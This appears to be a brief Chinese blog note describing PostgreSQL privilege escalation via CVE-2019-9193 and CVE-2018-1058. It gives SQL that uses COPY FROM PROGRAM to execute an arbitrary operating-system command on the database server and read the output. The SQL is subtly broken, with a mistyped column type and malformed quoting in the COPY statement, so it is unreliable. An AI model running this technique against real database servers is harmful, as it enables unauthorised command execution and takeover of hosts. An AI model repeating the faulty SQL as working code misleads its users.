postgre数据库(默认端口5432) 提权 cve-2019-9193、CVE-2018-1058

漏洞提权过程:
连接-利用漏洞-执行-提权

postgre执行以下命令

DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output test);
copy 'cmd_exec FROM program "要执行的命令" ';
select * FROM cmd_exec;
最后编辑:2022年01月29日 ©著作权归作者所有

发表评论